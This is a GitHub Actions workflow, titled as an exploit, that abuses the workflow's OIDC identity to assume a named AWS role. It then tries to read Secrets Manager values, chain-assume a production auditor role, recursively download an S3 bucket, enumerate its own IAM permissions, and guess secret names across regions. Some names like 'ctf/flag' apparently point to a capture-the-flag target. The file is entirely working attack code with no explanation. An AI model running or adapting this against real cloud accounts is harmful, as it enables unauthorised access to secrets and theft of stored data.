name: TARGETED EXPLOIT - Direct Secret Access

on:
  workflow_dispatch:
  push:

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
    - name: Configure AWS Credentials with Discovered Secrets
      uses: aws-actions/configure-aws-credentials@v4
      with:
        role-to-assume: arn:aws:iam::170974506515:role/github-deployment-role
        aws-region: us-west-1
        role-session-name: GitHubOIDCExploit
        role-external-id: "internal/secrets/id-v2"
        
    - name: Verify AWS Access
      run: |
        echo "🎉 AWS ACCESS SUCCESSFUL!"
        aws sts get-caller-identity
        
    - name: Try Direct Secret Access
      run: |
        echo "🎯 TRYING DIRECT ACCESS TO DISCOVERED SECRET..."
        # Try the exact secret ID we found
        echo "Accessing: internal/secrets/id-v2"
        aws secretsmanager get-secret-value --secret-id "internal/secrets/id-v2" --region us-west-1 || echo "Direct access failed"
        
    - name: Try Original Audit Role
      run: |
        echo "🔍 CHECKING ORIGINAL AUDIT ROLE ACCESS..."
        # Maybe this role can assume the other role we found in the gist
        aws sts assume-role \
          --role-arn "arn:aws:iam::170974506515:role/prod-readonly-auditor" \
          --role-session-name "ChainedAssumeRole" \
          --external-id "internal/secrets/id-v2" 2>/dev/null || echo "Role chaining failed"
          
    - name: Try S3 Bucket from Gist  
      run: |
        echo "📦 CHECKING S3 BUCKET ACCESS..."
        aws s3 ls s3://ci-deployment-logsv1/ --region us-west-1 || echo "S3 access failed"
        aws s3 cp s3://ci-deployment-logsv1/ . --recursive --region us-west-1 || echo "S3 download failed"
        
    - name: Check IAM Permissions
      run: |
        echo "🔐 CHECKING WHAT PERMISSIONS WE HAVE..."
        # Try to see what we can do with this role
        aws iam get-role --role-name github-deployment-role 2>/dev/null || echo "Can't read own role"
        aws iam list-attached-role-policies --role-name github-deployment-role 2>/dev/null || echo "Can't list policies"
        
    - name: Try Common Secret Patterns
      run: |
        echo "🎲 TRYING COMMON SECRET PATTERNS..."
        # Try patterns based on what we know
        for secret in "github-deployment-secret" "deployment-credentials" "hexnova404/flag" "ctf/flag" "internal/flag" "prod/flag"; do
          echo "Trying: $secret"
          aws secretsmanager get-secret-value --secret-id "$secret" --region us-west-1 2>/dev/null && echo "SUCCESS: $secret" || echo "Failed: $secret"
        done
        
    - name: Alternative Regions
      run: |
        echo "🌍 TRYING OTHER REGIONS..."
        for region in "us-east-1" "us-east-2" "us-west-2"; do
          echo "Trying region: $region"
          aws secretsmanager get-secret-value --secret-id "internal/secrets/id-v2" --region "$region" 2>/dev/null && echo "SUCCESS in $region" || echo "Failed in $region"
        done